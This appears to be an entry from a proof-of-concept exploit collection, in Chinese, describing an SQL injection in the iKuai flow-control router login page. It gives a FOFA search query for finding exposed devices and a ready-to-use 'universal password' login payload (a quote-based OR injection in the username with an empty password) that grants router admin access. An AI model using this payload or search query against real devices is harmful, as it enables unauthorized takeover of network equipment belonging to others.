Awesome-POC/网络设备漏洞/iKuai 流控路由 SQL注入漏洞.md
Threekiii e9e1a4597a init
2022-02-20 17:08:56 +08:00

546 B
Raw Blame History

iKuai 流控路由 SQL注入漏洞

漏洞描述

iKuai 流控路由 存在SQL注入漏洞可以通过SQL注入漏洞构造万能密码获取路由器后台管理权限

漏洞影响

iKuai 流控路由

FOFA

title="登录爱快流控路由"

漏洞复现

登录页面如下

使用万能密码登录后台

user: "or""=""or""="
pass: 空